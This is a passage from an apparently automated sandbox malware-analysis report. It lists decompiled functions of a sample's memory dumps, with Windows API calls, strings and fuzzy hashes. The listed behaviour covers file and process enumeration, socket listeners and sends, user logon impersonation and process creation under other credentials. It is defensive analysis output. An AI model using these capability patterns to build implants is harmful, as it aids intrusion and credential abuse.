                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap_malloc
                            • String ID:
                            • API String ID: 501242067-0
                            • Opcode ID: 770a5737fa1c2baebb51fc1048b2bd86ee1b0969124dc220f3e5ed95a16c1eaa
                            • Instruction ID: 9a4a4a641a33d025046202f2acab0d5c5cc38841d28dc9181b7c81ddade9565d
                            • Opcode Fuzzy Hash: 770a5737fa1c2baebb51fc1048b2bd86ee1b0969124dc220f3e5ed95a16c1eaa
                            • Instruction Fuzzy Hash: 6DE09A726086025FDB688E2DF841A16B7F19B85720B64CE3EE09AC7695DA3494819A24
                            Function 00DCA68A Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00DCA3C6,00000001,?,?,?,00DCA53F,?,?,?,00DE36E0,0000000C,00DCA5FA), ref: 00DCA69F
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: 2ffa34e97410b0011fdfa679f589b9e3d735e4620a10fc9987c1085e38182e29
                            • Instruction ID: 8991fdc93df828f2f6bf1f6248ad17d98383d56d780575a894759860fefca79d
                            • Opcode Fuzzy Hash: 2ffa34e97410b0011fdfa679f589b9e3d735e4620a10fc9987c1085e38182e29
                            • Instruction Fuzzy Hash: B7D05E725903499EEB106FB4BC09B223BDC9784799F158437B90CCA250E774D641D528
                            Function 00D7A860 Relevance: 1.3, APIs: 1, Instructions: 93memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00D79DA8,?,00D79DA8,AAAABBBB), ref: 00D7A94F
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 06db9e082881e3a7de2518e710500035fed678b226e83921418e753830c2cfca
                            • Instruction ID: 4444ce1b49823004aa5ed429690095b583c18930cd23931c15681bb5875c1e63
                            • Opcode Fuzzy Hash: 06db9e082881e3a7de2518e710500035fed678b226e83921418e753830c2cfca
                            • Instruction Fuzzy Hash: 3031BD70A00109EFCB08CF99C894AAEB7B5FF88314F14C159E919AB394D770AE51CF95
                            Function 00DB54A0 Relevance: 1.3, APIs: 1, Instructions: 31sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNELBASE(?,?,?,00DB16A0,?), ref: 00DB54FB
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 907562bb38f077f7c6f26acf487778ea9b24e02ba573ca1ab4b40f9f92c6591b
                            • Instruction ID: 35b38a3e5317b4ede47395129afeb6e9c34c6901bed16381d3c930d6e99748ef
                            • Opcode Fuzzy Hash: 907562bb38f077f7c6f26acf487778ea9b24e02ba573ca1ab4b40f9f92c6591b
                            • Instruction Fuzzy Hash: F5F0543641070AEBDF146B55FC457A43BA5FF05355F18413AE406C9269DB32C494CA75
                            Function 00DB54A0 Relevance: 1.3, APIs: 1, Instructions: 31sleepCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • Sleep.KERNELBASE(?,00DEC1B4,?,00DB16A0,00DEC1B4), ref: 00DB54FB
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 9e31b146223353ee4fb2abb701a5df8a603abebe878e35761fae754d0049fb3e
                            • Instruction ID: 35b38a3e5317b4ede47395129afeb6e9c34c6901bed16381d3c930d6e99748ef
                            • Opcode Fuzzy Hash: 9e31b146223353ee4fb2abb701a5df8a603abebe878e35761fae754d0049fb3e
                            • Instruction Fuzzy Hash: F5F0543641070AEBDF146B55FC457A43BA5FF05355F18413AE406C9269DB32C494CA75
                            Function 004029E0 Relevance: 1.3, APIs: 1, Instructions: 14sleepCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00401805: GetTickCount.KERNEL32 ref: 0040180B
                              • Part of subcall function 00401805: sprintf.MSVCRT ref: 00401875
                              • Part of subcall function 00401805: CreateThread.KERNELBASE ref: 004018A9
                            • Sleep.KERNELBASE(?,00401386,?,0000165A,00401386), ref: 00402A09
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: CountCreateSleepThreadTicksprintf
                            • String ID:
                            • API String ID: 2384577035-0
                            • Opcode ID: edd1f4d74f08d7a86e4d3b4e7046a0930fe99e0aed8f677c13492f49e07a44d4
                            • Instruction ID: afb1948537415933b36a4db080653cee2dd393a0534abb60b1e029c31af3872c
                            • Opcode Fuzzy Hash: edd1f4d74f08d7a86e4d3b4e7046a0930fe99e0aed8f677c13492f49e07a44d4
                            • Instruction Fuzzy Hash: 90D05EB1408704AAC6003FB5C90A71ABAA8AB05351F01063CF9C1251E1DF7950108B7B

                            Non-executed Functions

                            Function 00DB5225 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 172filetimeCOMMON
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00DB5237
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • _memset.LIBCMT ref: 00DB5243
                              • Part of subcall function 00DB16CB: _malloc.LIBCMT ref: 00DB16D1
                              • Part of subcall function 00DB171B: htonl.WS2_32(0000001F), ref: 00DB1721
                            • _strncmp.LIBCMT ref: 00DB5292
                            • GetCurrentDirectoryA.KERNEL32(00004000,00000000), ref: 00DB52A0
                              • Part of subcall function 00DC8722: __lock.LIBCMT ref: 00DC8740
                              • Part of subcall function 00DC8722: ___sbh_find_block.LIBCMT ref: 00DC874B
                              • Part of subcall function 00DC8722: ___sbh_free_block.LIBCMT ref: 00DC875A
                              • Part of subcall function 00DC8722: HeapFree.KERNEL32(00000000,00000000,00DE35A0,0000000C,00DCD788,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C), ref: 00DC878A
                              • Part of subcall function 00DC8722: GetLastError.KERNEL32(?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5,00000000,00000000,?,00DCD842,0000000D), ref: 00DC879B
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00DB52D1
                            • GetLastError.KERNEL32 ref: 00DB52DE
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DB532A
                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00DB533A
                            • FindNextFileA.KERNEL32(00000000,00000010), ref: 00DB53CD
                            • FindClose.KERNEL32(00000000), ref: 00DB53DC
                              • Part of subcall function 00DB1825: _vwprintf.LIBCMT ref: 00DB182F
                              • Part of subcall function 00DB1825: _vswprintf_s.LIBCMT ref: 00DB1853
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$FileFind$ErrorHeapLastSystem_malloc$AllocateCloseCurrentDirectoryFirstFreeLocalNextSpecific___sbh_find_block___sbh_free_block__lock_memset_strncmp_vswprintf_s_vwprintfhtonl
                            • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                            • API String ID: 2804257087-1754256099
                            • Opcode ID: 89c83abd30822cac4ed41a2fc1cefeba8620565b8f7f31f714c5e024469829cd
                            • Instruction ID: fe9ed71b35b2c4b1b0e16ddbae8e82ec3d813c6d256df7658556778c6e803426
                            • Opcode Fuzzy Hash: 89c83abd30822cac4ed41a2fc1cefeba8620565b8f7f31f714c5e024469829cd
                            • Instruction Fuzzy Hash: 6C513EB6900229FACB10ABE5DC46EFFB7BCEF48754F440426F516E2181FA789A449770
                            Function 00DBA4E3 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 157processCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DBA504
                              • Part of subcall function 00DB16CB: _malloc.LIBCMT ref: 00DB16D1
                            • GetCurrentProcess.KERNEL32 ref: 00DBA54F
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DBA583
                            • Process32First.KERNEL32(00000000,?), ref: 00DBA5A5
                              • Part of subcall function 00DB171B: htonl.WS2_32(0000001F), ref: 00DB1721
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00DBA688
                              • Part of subcall function 00DBA477: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00DBA484
                            • ProcessIdToSessionId.KERNEL32(?,?,00000002,00000000), ref: 00DBA629
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Process32$CreateCurrentFirstNextOpenSessionSnapshotTokenToolhelp32_malloc_memsethtonl
                            • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                            • API String ID: 3674674043-1833344708
                            • Opcode ID: d6a3fb1332c80a530f0cb4c6b72c72ab712afee1be651f790671b4078455f093
                            • Instruction ID: 2f28fedbba0dec205bc08bfc1c48d6060be0ed4a922f4ff937750d6f302497ab
                            • Opcode Fuzzy Hash: d6a3fb1332c80a530f0cb4c6b72c72ab712afee1be651f790671b4078455f093
                            • Instruction Fuzzy Hash: D35163B6900219EADF21BBA5CC46FEF77BCEF04754F140066F50AE2152EA349A858B71
                            Function 00DBA70E Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 84fileCOMMON
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00DBA71B
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • __snprintf.LIBCMT ref: 00DBA72C
                            • FindFirstFileA.KERNEL32(00000000,00DB50C9,?,00DBA7FD,00DB50C9,?,Function_0000504D), ref: 00DBA739
                              • Part of subcall function 00DC8722: __lock.LIBCMT ref: 00DC8740
                              • Part of subcall function 00DC8722: ___sbh_find_block.LIBCMT ref: 00DC874B
                              • Part of subcall function 00DC8722: ___sbh_free_block.LIBCMT ref: 00DC875A
                              • Part of subcall function 00DC8722: HeapFree.KERNEL32(00000000,00000000,00DE35A0,0000000C,00DCD788,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C), ref: 00DC878A
                              • Part of subcall function 00DC8722: GetLastError.KERNEL32(?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5,00000000,00000000,?,00DCD842,0000000D), ref: 00DC879B
                            • _malloc.LIBCMT ref: 00DBA778
                            • __snprintf.LIBCMT ref: 00DBA78D
                              • Part of subcall function 00DBA6D1: _malloc.LIBCMT ref: 00DBA6DC
                              • Part of subcall function 00DBA6D1: __snprintf.LIBCMT ref: 00DBA6F0
                            • FindNextFileA.KERNEL32(000000FF,00DB50C9,?,?,?,?,?,?,?), ref: 00DBA7BA
                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?), ref: 00DBA7C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find__snprintf_malloc$FileHeap$AllocateCloseErrorFirstFreeLastNext___sbh_find_block___sbh_free_block__lock
                            • String ID: %s\*
                            • API String ID: 1254174322-766152087
                            • Opcode ID: 13c30badbf75fe15fb98529e44810901c4bc1067a590880ef9cd38e24dc63871
                            • Instruction ID: fb09acfb4f580dd76f7bea67d60a680dc41548e64f19eaf298f440e4e6ab5ef9
                            • Opcode Fuzzy Hash: 13c30badbf75fe15fb98529e44810901c4bc1067a590880ef9cd38e24dc63871
                            • Instruction Fuzzy Hash: C021AF72500209FBDF116F258C45EAB3B69EF417A0F188029F805A7291EF718E51ABB1
                            Function 00DB4763 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 98processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessWithLogonW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,00DB4994,C3E8296A,83FFFFDB,74DEE010,00DB4ACB), ref: 00DB4795
                            • GetLastError.KERNEL32 ref: 00DB47A7
                            • _memset.LIBCMT ref: 00DB47F0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateErrorLastLogonProcessWith_memset
                            • String ID: sysnative$system32
                            • API String ID: 2584212486-2461298002
                            • Opcode ID: 34e5995cc04eafa7ce9271aedd5918d8475104e375b68d3cfa7db0205f1da5c2
                            • Instruction ID: 3d888f660f52d5fcd4751560cb727e7f95d87dadc7a8119517935ea4b8eb6478
                            • Opcode Fuzzy Hash: 34e5995cc04eafa7ce9271aedd5918d8475104e375b68d3cfa7db0205f1da5c2
                            • Instruction Fuzzy Hash: 2F312D7A900251FFCB129F64AC09FE63BA9EF45310F184055F996DB252DB71D904C7B0
                            Function 00DB4763 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 98processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessWithLogonW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,00DB4994,C3E8296A,83FFFFDB,00DDB190,00DB4ACB), ref: 00DB4795
                            • GetLastError.KERNEL32 ref: 00DB47A7
                            • _memset.LIBCMT ref: 00DB47F0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateErrorLastLogonProcessWith_memset
                            • String ID: sysnative$system32
                            • API String ID: 2584212486-2461298002
                            • Opcode ID: 6f9d7035524612a16483502095c16a172a2c917a4d495048557f653f2366b610
                            • Instruction ID: 3d888f660f52d5fcd4751560cb727e7f95d87dadc7a8119517935ea4b8eb6478
                            • Opcode Fuzzy Hash: 6f9d7035524612a16483502095c16a172a2c917a4d495048557f653f2366b610
                            • Instruction Fuzzy Hash: 2F312D7A900251FFCB129F64AC09FE63BA9EF45310F184055F996DB252DB71D904C7B0
                            Function 00DB8699 Relevance: 9.1, APIs: 6, Instructions: 68networkCOMMON
                            Download Yara Rule
                            APIs
                            • htonl.WS2_32 ref: 00DB86B6
                            • htons.WS2_32(?), ref: 00DB86C6
                            • socket.WS2_32(00000002,00000002,00000000), ref: 00DB86DC
                            • closesocket.WS2_32(00000000), ref: 00DB86E9
                            • bind.WS2_32(00000000,?,00000010), ref: 00DB8717
                            • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00DB872E
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                            • String ID:
                            • API String ID: 3910169428-0
                            • Opcode ID: 8ddc581e2a499d347e69a0bf1684f5242460dfa37f450859a17bbf26abff2891
                            • Instruction ID: 7d3526ffe677d900a35bc833a07800624ee3746e5ba7b9dc34b81b8b5537df45
                            • Opcode Fuzzy Hash: 8ddc581e2a499d347e69a0bf1684f5242460dfa37f450859a17bbf26abff2891
                            • Instruction Fuzzy Hash: F0119072A00214EAD700ABF99C86EEEB7BCDF08728F104166F611E6191EA748A049779
                            Function 00DB3685 Relevance: 9.1, APIs: 6, Instructions: 68sleepnetworkCOMMON
                            Download Yara Rule
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB3697
                            • Sleep.KERNEL32(000003E8), ref: 00DB3707
                            • GetTickCount.KERNEL32 ref: 00DB370D
                            • Sleep.KERNEL32(000003E8), ref: 00DB3720
                            • closesocket.WS2_32(00000000), ref: 00DB3727
                            • send.WS2_32(00000000,?,?,00000000), ref: 00DB373A
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountSleepTick$closesocketsend
                            • String ID:
                            • API String ID: 1472970430-0
                            • Opcode ID: ffad76579d718df4260da560444256de145bd7a6418c974a69003c438ee2826a
                            • Instruction ID: b2b9d993faee98f7bad836e14df956a8078451dfeb62a8753f626edaff4b20f4
                            • Opcode Fuzzy Hash: ffad76579d718df4260da560444256de145bd7a6418c974a69003c438ee2826a
                            • Instruction Fuzzy Hash: C4116DB2C00218EBDF01ABF49C82CDD7B78EF04320F240527F112A6191EE359604AB75
                            Function 00DB85B7 Relevance: 9.1, APIs: 6, Instructions: 54networkCOMMON
                            Download Yara Rule
                            APIs
                            • socket.WS2_32(00000002,00000001,00000000), ref: 00DB85CF
                            • htons.WS2_32(?), ref: 00DB85EB
                            • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00DB8604
                            • closesocket.WS2_32(00000000), ref: 00DB860F
                            • bind.WS2_32(00000000,?,00000010), ref: 00DB861D
                            • listen.WS2_32(00000000,?), ref: 00DB862B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: bindclosesockethtonsioctlsocketlistensocket
                            • String ID:
                            • API String ID: 1767165869-0
                            • Opcode ID: b03050f498ad8b4b05d9a0e8657c4d2085af81a405eeff0bd84cb1126a4fd252
                            • Instruction ID: b033763a301522e9daa272c25c5e4d8ecc62b328a24433a6f9f770b729a68dd9
                            • Opcode Fuzzy Hash: b03050f498ad8b4b05d9a0e8657c4d2085af81a405eeff0bd84cb1126a4fd252
                            • Instruction Fuzzy Hash: F101B531641668FACB21AFA58C45EEFBB2DEF41760F140117F942E6291EB308A41D3F9
                            Function 00DBE272 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00DBDF1C: RevertToSelf.ADVAPI32(00000100,00DBE4B0,00000000,?,?,00DB19A7,?,00000000,00000000,00000000,00000100,00000100), ref: 00DBDF33
                            • LogonUserA.ADVAPI32(?,?,?,00000009,00000003,00DF08A4), ref: 00DBE292
                            • GetLastError.KERNEL32 ref: 00DBE29C
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                              • Part of subcall function 00DB31C8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,00DB4ACB,?,00DB48E4,00DB4ACB,?,00000400), ref: 00DB31DE
                              • Part of subcall function 00DB31C8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00DB4ACB,00DB48E4,?,00DB48E4,00DB4ACB,?,00000400,?,?,?,?,00DB4ACB), ref: 00DB31F7
                              • Part of subcall function 00DB16CB: _malloc.LIBCMT ref: 00DB16D1
                              • Part of subcall function 00DB1825: _vwprintf.LIBCMT ref: 00DB182F
                              • Part of subcall function 00DB1825: _vswprintf_s.LIBCMT ref: 00DB1853
                              • Part of subcall function 00DB1864: _memset.LIBCMT ref: 00DB1872
                            • ImpersonateLoggedOnUser.ADVAPI32 ref: 00DBE2B6
                            • GetLastError.KERNEL32 ref: 00DBE2C0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$ByteCharErrorLastMultiUserWide$ImpersonateLoggedLogonRevertSelf_memset_vswprintf_s_vwprintf
                            • String ID: %s\%s
                            • API String ID: 744593125-4073750446
                            • Opcode ID: 9057c93d9e1a47a0bf1ce3c8525b3ec33e86fa725b539167fd98b30723d0bc9e
                            • Instruction ID: 0e8e7261050e87524d9616be91a81cbdb540651a9b5c9d33688d4bc0554c2f94
                            • Opcode Fuzzy Hash: 9057c93d9e1a47a0bf1ce3c8525b3ec33e86fa725b539167fd98b30723d0bc9e
                            • Instruction Fuzzy Hash: 2831EFB5500309FEDB017BA5EC46EEA3FADEB04794F544025F50AD6262EB318614DBF1
                            Function 00DD0331 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 00DD41AD
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DD41C2
                            • UnhandledExceptionFilter.KERNEL32(00DDBC2C), ref: 00DD41CD
                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00DD41E9
                            • TerminateProcess.KERNEL32(00000000), ref: 00DD41F0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                            • String ID:
                            • API String ID: 2579439406-0
                            • Opcode ID: 8f2c49d16298889554fbe74834460f7822af03f5a5379f627a53c77ddf9174d9
                            • Instruction ID: 2cf7a98ae4242a1c621d3a73a58e81e2bd74889591480ed6b1389cf8a9b787f5
                            • Opcode Fuzzy Hash: 8f2c49d16298889554fbe74834460f7822af03f5a5379f627a53c77ddf9174d9
                            • Instruction Fuzzy Hash: 1F21C2B5422384DFC711EF68FDC56143BE0FB48326F50201AE908CA362D77455868F79
                            Function 00401A60 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                            Download Yara Rule
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00401AAF
                            • UnhandledExceptionFilter.KERNEL32 ref: 00401ABF
                            • GetCurrentProcess.KERNEL32 ref: 00401AC8
                            • TerminateProcess.KERNEL32 ref: 00401AD9
                            • abort.MSVCRT ref: 00401AE2
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                            • String ID:
                            • API String ID: 520269711-0
                            • Opcode ID: f1735b2a21335909bc253273f0ac7d76cfe1abd3c6ccf2038b615fc4144ab68f
                            • Instruction ID: 4cf10dc5dd0b46c0d15535f06df006338fe5ac01ee9545680c35680ef873d5b5
                            • Opcode Fuzzy Hash: f1735b2a21335909bc253273f0ac7d76cfe1abd3c6ccf2038b615fc4144ab68f
                            • Instruction Fuzzy Hash: C71104B8904701CFC700EF79E98860ABBF0BB48305F418939E98897362E774D944CF5A
                            Function 004019A0 Relevance: 7.6, APIs: 5, Instructions: 55timethreadCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32 ref: 004019DF
                            • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014B2), ref: 004019F0
                            • GetCurrentThreadId.KERNEL32 ref: 004019F8
                            • GetTickCount.KERNEL32 ref: 00401A00
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014B2), ref: 00401A0F
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                            • String ID:
                            • API String ID: 1445889803-0
                            • Opcode ID: ce9964a745ff34b1e52db9bb427ed0266c0b5c27dc7e9c3f673c87eb161a208f
                            • Instruction ID: f91986c62e855f646c45f311636352fb5b7618295fe1daaf99d33dd895697f3e
                            • Opcode Fuzzy Hash: ce9964a745ff34b1e52db9bb427ed0266c0b5c27dc7e9c3f673c87eb161a208f
                            • Instruction Fuzzy Hash: 72112EB56093008BD710DF7AE9CC64BBBE0FB88355F150C3AE545C6720EA35D849CB96
                            Function 00401A5C Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                            Download Yara Rule
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00401AAF
                            • UnhandledExceptionFilter.KERNEL32 ref: 00401ABF
                            • GetCurrentProcess.KERNEL32 ref: 00401AC8
